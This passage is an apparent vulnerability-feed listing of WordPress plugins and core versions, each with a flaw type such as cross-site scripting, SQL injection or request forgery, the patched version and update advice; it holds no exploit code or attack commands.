Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: SQL Injection
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6.1
Recommended Action: Update to version 1.2.6.1, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Multiple Vulnerabilities
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via Tag Filter Links
Patched Version: 2.0.13.1
Recommended Action: Update to version 2.0.13.1, or a newer patched version

Plugin: Complete Open Graph

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Title Experiments Free

Vulnerability: SQL Injection
Patched Version: 9.0.1
Recommended Action: Update to version 9.0.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: 2.9.42
Patched Version: 2.9.42.1
Recommended Action: Update to version 2.9.42.1, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Directory Traversal
Patched Version: 1.14.2.2
Recommended Action: Update to version 1.14.2.2, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Album Gallery – WordPress Gallery

Vulnerability: Cross-Site Request Forgery via album-gallery-column-settings.php
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: affiliate-toolkit – WP Affiliate Plugin with Amazon

Vulnerability: Reflected Cross-Site Scripting via keyword
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: WP Image Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rife Elementor Extensions & Templates

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: VideoWhisper Video Presentation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.31
Recommended Action: Update to version 3.31, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting in Language Settings
Patched Version: 4.7.8
Recommended Action: Update to version 4.7.8, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: seolinkrotator

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Global Multisite Search

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CRM and Lead Management by vcita

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.95
Recommended Action: Update to version 3.6.95, or a newer patched version

Plugin: uContext for Amazon

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Better Font Awesome

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Product Slider for WooCommerce by PickPlugins

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.13.22
Recommended Action: Update to version 1.13.22, or a newer patched version

Plugin: KD Coming Soon

Vulnerability: Unauthenticated PHP Object Injection via cetitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail carousel slider

Vulnerability: Stored Cross-Site Scripting and Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Solid Central – Site Management, Backups, Security, and Reporting

Vulnerability: Cross-Site Request Forgery and Missing Authorization via ‘hide_authenticate_notice’
Patched Version: 2.1.14
Recommended Action: Update to version 2.1.14, or a newer patched version

Plugin: User Profile Picture

Vulnerability: Authenticated Insecure Direct Object Reference
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: BuddyPress Extended Friendship Request

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: WP Backup+

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Subscribe to Category

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto Login New User After Registration

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via alnuar_auto_login_new_user_after_registration_redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Security & Malware scan by CleanTalk

Vulnerability: Missing Authorization
Patched Version: 2.51
Recommended Action: Update to version 2.51, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery via wp_ajax_wp_compression_test
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.05
Recommended Action: Update to version 7.1.05, or a newer patched version

Plugin: Japanized For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: ZoomSounds – WordPress Wave Audio Player with Playlist

Vulnerability: Arbitrary File Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Be POPIA Compliant

Vulnerability: Sensitive Information Exposure
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Core: WordPress

Vulnerability: Shared User Instance Weakness
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Banner Effect Header

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Analyticator

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.9.4
Recommended Action: Update to version 6.4.9.4, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: Easy Google Maps

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.32
Recommended Action: Update to version 1.9.32, or a newer patched version

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Theme My Login

Vulnerability: Local File Inclusion
Patched Version: 6.3.10
Recommended Action: Update to version 6.3.10, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Campaign Message
Patched Version: 3.1.20
Recommended Action: Update to version 3.1.20, or a newer patched version

Plugin: Menu Image, Icons made easy

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: SMTP by BestWebSoft

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: About Author

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Sliced Invoices – WordPress Invoice Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 14.0
Recommended Action: Update to version 14.0, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.20
Recommended Action: Update to version 1.10.20, or a newer patched version

Plugin: Image Zoom

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Job Board

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.7
Recommended Action: Update to version 2.10.7, or a newer patched version

Plugin: ANAC XML Bandi di Gara

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.8
Recommended Action: Update to version 2.9.8, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Missing Authorization
Patched Version: 7.13.55
Recommended Action: Update to version 7.13.55, or a newer patched version

Plugin: Invite Anyone

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce PayPal Payments

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any Theme – My Sticky Bar (formerly myStickymenu)

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Form Lead Deletion
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Count per Day

Vulnerability: Arbitrary File Download
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: EnvíaloSimple: Email Marketing y Newsletters

Vulnerability: Cross-Site Scripting
Patched Version: 1.98
Recommended Action: Update to version 1.98, or a newer patched version

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.84
Recommended Action: Update to version 4.8.84, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Unauthenticated Stored Cross-Site Scripting via profile_title
Patched Version: 1.0.8.1
Recommended Action: Update to version 1.0.8.1, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcodes
Patched Version: 2.9.12
Recommended Action: Update to version 2.9.12, or a newer patched version

Plugin: wpDataTables (Premium)

Vulnerability: Improper Access Control leading to Table Permission Takeover
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Age Gate

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.16.4
Recommended Action: Update to version 2.16.4, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Easy Coming Soon

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Image and Video Lightbox, Image PopUp

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WordPress Font Uploader

Vulnerability: Arbitrary File Upload
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Elastic Email Sender

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Admin+ Arbitrary File Upload
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.15
Recommended Action: Update to version 2.9.15, or a newer patched version

Plugin: GamePress – The Game Database Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthenticated Privilege Escalation via User Roles
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: Use-Your-Drive

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.18.3
Recommended Action: Update to version 1.18.3, or a newer patched version

Plugin: Splashscreen

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FeedWordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2015.0514
Recommended Action: Update to version 2015.0514, or a newer patched version

Plugin: Meteor Slides

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: WP Dark Mode – WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Authenticated (Subscriber+) Local File Inclusion
Patched Version: 5.30.5
Recommended Action: Update to version 5.30.5, or a newer patched version

Plugin: Mailchimp for WooCommerce

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: adminer

Vulnerability: Security Bypass to Database Login
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: String locator

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 8.1
Recommended Action: Update to version 8.1, or a newer patched version

Core: WordPress

Vulnerability: Revision History Disclosure
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: GD Rating System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.60
Recommended Action: Update to version 3.2.60, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: MathJax-LaTeX

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.7.12
Recommended Action: Update to version 3.7.12, or a newer patched version

Plugin: EELV Newsletter

Vulnerability: Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.1.23
Recommended Action: Update to version 2.1.23, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Unauthenticated SQL Injection via cg_Fields
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.76
Recommended Action: Update to version 4.8.76, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Arbitrary File Upload
Patched Version: 2.8.1.2
Recommended Action: Update to version 2.8.1.2, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Unauthorized Settings Change
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Easy Contact Form Pro

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.1.9
Recommended Action: Update to version 1.1.1.9, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Authentication Bypass
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: alfred24 Click & Collect

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Aajoda Testimonials

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: FreshMail For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Deals for WooCommerce

Vulnerability: Missing Authorization via vtprd_ajax_clone_rule
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Register Plus

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom 404 Pro

Vulnerability: Unauthenticated Stored Cross-Site Scripting via logging
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: Star CloudPRNT for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Sensitive Information Exposure
Patched Version: 0.9.2.5
Recommended Action: Update to version 0.9.2.5, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: WP Front-End Repository Manager

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ImageLinks Interactive Image Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Missing Authorization
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Cross-Site Request Forgery to Cursor Manipulation
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Core: WordPress

Vulnerability: All known versions
Patched Version: No patched version available
Recommended Action: No known patch available. Review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance.

Plugin: bbPress Toolkit

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker Pro

Vulnerability: SQL Injection
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: Malicious Backdoor
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Keap Landing Pages

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cookie Bar

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: ThirstyAffiliates – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: MX Time Zone Clocks

Vulnerability: Contributor+ Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: EventON

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Content Copy Protection & Prevent Image Save

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shop

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.4.3.19
Recommended Action: Update to version 3.4.3.19, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Incorrect Authorization Checks Allowing Post Modification
Patched Version: 1.0.126
Recommended Action: Update to one of the following versions, or a newer patched version: 1.0.126, 2.3.12

Plugin: Virtual Robots.txt

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Google XML Sitemap for Images

Vulnerability: Cross-Site Request Forgery via image_sitemap_generate
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: wp-FileManager

Vulnerability: Arbitrary File Upload
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 118
Recommended Action: Update to version 118, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.53
Recommended Action: Update to version 2.53, or a newer patched version

Plugin: Calendar_plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: Checkout Field Manager (Checkout Manager) for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.7
Recommended Action: Update to version 5.5.7, or a newer patched version

Plugin: WP HTML Author Bio

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loginizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Simple Retail Menus

Vulnerability: SQL Injection
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Quick Page/Post Redirect Plugin

Vulnerability: Redirect Security Bypass
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: FileOrganizer – Manage WordPress and Website Files

Vulnerability: Authenticated (Admin+) Arbitrary File Access
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: WP Affiliate Disclosure

Vulnerability: Cross-Site Request Forgery via check_capability
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.8
Recommended Action: Update to version 1.11.8, or a newer patched version

Plugin: Popup Maker and Popup Anything – Popup for opt-ins and Lead Generation Conversions

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘attach_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Shariff for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WordPress Language

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Google Analytics Extension

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Auto Amazon Links – Amazon Associates Affiliate Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via style
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: 3xSocializer

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cryptographp

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Spam Protection Bypass
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Debug Bar – Enable WP_DEBUG from admin dashboard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.86
Recommended Action: Update to version 1.86, or a newer patched version

Plugin: WP SOCIAL BOOKMARK MENU

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced XML Reader

Vulnerability: External Entity Injection
Patched Version: No patched version available
